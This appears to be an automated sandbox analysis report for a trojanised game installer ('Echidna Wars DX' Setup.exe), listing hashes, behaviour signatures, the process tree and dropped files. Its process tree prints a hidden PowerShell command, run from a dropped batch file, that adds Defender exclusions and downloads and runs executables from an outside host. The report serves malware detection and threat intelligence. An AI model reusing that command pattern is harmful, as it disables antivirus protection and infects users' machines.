Analysis

  • max time kernel
    64s
  • max time network
    77s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    22/02/2024, 20:18

General

  • Target

    Setup.exe

  • Size

    43.4MB

  • MD5

    308090e687a5e248d6aa4a65a5db85a6

  • SHA1

    ef668821cca3ed41f1212a35ce51b942f4805850

  • SHA256

    0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29

  • SHA512

    7bb70fb7c8cd6a136d3870f4797a65bd67c37cf25eabd413971beda0af2e6721a0d5893ce05de67d5a5f720785ddac36c78a80dc8b38fef486963b74937edb3b

  • SSDEEP

    786432:FAjeV1AyC0U9MLgeO3lPsagQYUQ4xo8vo4mMnmOZUQA2dhfTKBGG+U8ON9wB:w0kp9K7O3lPBgQHjPn1UsdBTKX+U8ONE

Score
7/10

Signatures

  • Executes dropped EXE (2 IoCs)
  • Loads dropped DLL (6 IoCs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Program crash (1 IoC)
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (15 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\SysWOW64\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:4456
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4600
    • C:\Echidna Wars DX\Game.exe
      "C:\Echidna Wars DX\Game.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      PID:4500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772
        2⤵
        • Program crash
        PID:2844
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x2f4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2840

Downloads

          • C:\Echidna Wars DX\Game.exe

            Filesize

            6.9MB

            MD5

            7de3741fb79dcfa8df54a4daa90c8692

            SHA1

            8003f910997a50719d55ff098f42a23d13598b08

            SHA256

            86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b

            SHA512

            31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c

          • C:\Echidna Wars DX\Game.exe

            Filesize

            8.7MB

            MD5

            4e26e69b1622efa982a86cbe2edd5801

            SHA1

            8d75b18942f4ab79e29457d12d47cb7bb8763612

            SHA256

            4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472

            SHA512

            2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7

          • C:\Echidna Wars DX\Game.exe

            Filesize

            28.3MB

            MD5

            5769be658b2478d3d437c152adec05cf

            SHA1

            9794744bd45a038641f219ecefd31fa2e239ebbd

            SHA256

            4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e

            SHA512

            8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e

          • C:\Echidna Wars DX\config.bat

            Filesize

            559B

            MD5

            62f9201f9ed75ebef04946bcdf72d95a

            SHA1

            5779fad609e0c77363e6436230954243c29c9205

            SHA256

            f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847

            SHA512

            ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806

          • C:\Echidna Wars DX\hspda.dll

            Filesize

            57KB

            MD5

            88735cdf603d77cceef556215e43a45f

            SHA1

            47a4d364015a3f17143978b32aeb35220c54cb0a

            SHA256

            0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212

            SHA512

            06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71

          • C:\Echidna Wars DX\ovplay.dll

            Filesize

            131KB

            MD5

            def47290ed52d7ce0a2e65e8ffac95a2

            SHA1

            0edc4bb840d995a5d80f1cd15026e655c817a6ce

            SHA256

            558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc

            SHA512

            469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

            Filesize

            3.0MB

            MD5

            9665ccc8017eab35c9bea56ab727692a

            SHA1

            177a4d25e994e3a5e792360ce1ef48a25c9600e3

            SHA256

            dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c

            SHA512

            df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5

          • \Echidna Wars DX\hmm.dll

            Filesize

            608KB

            MD5

            401a237f4e02457713382b2413a4800c

            SHA1

            fcddfc03d93011efb0e0910c456aa47f2e632057

            SHA256

            5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565

            SHA512

            443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61

          • \Echidna Wars DX\hspogg.dll

            Filesize

            236KB

            MD5

            8c44de023765b683fce13c7d17a00add

            SHA1

            b5256452df6f534057271a8cd1df817ce3a5bbe7

            SHA256

            02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8

            SHA512

            ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2
